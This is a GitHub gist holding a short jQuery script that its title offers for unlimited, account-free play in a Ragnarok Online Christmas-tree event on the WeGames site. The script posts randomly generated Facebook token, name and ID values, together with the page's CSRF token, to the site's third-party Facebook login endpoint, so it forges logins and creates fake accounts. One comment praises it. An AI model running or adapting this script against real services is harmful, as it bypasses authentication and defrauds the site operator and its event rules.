Last active
December 10, 2017 17:16
-
-
Save x3388638/6480bad78324be6f47cd58c5f221a7ad to your computer and use it in GitHub Desktop.
仙境傳說 守護永的愛 RO 耶誕城揪伴裝飾你的聖誕樹 海豹 不求人,免帳號無限佈置 (demo: https://drive.google.com/file/d/1nTnqPMkR_mOAHlJqG8DEsqhs9GLc1lsg/view?usp=sharing)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$.ajax({ | |
url: 'https://www.wegames.com.tw/Third/facebook', | |
type: 'post', | |
data: { | |
token_for_business: ((Math.random()*10e17).toString(16) + (Math.random()*10e17).toString(16)).substring(0,16), | |
name: Date.now().toString(16), | |
id: Math.random()*10e17, | |
YII_CSRF_TOKEN: $('input[name="YII_CSRF_TOKEN"]').val() | |
}, | |
success: function () { | |
location.href = 'https://www.wegames.com.tw/member/event_login_check'; | |
} | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
@kenornotes 好猛R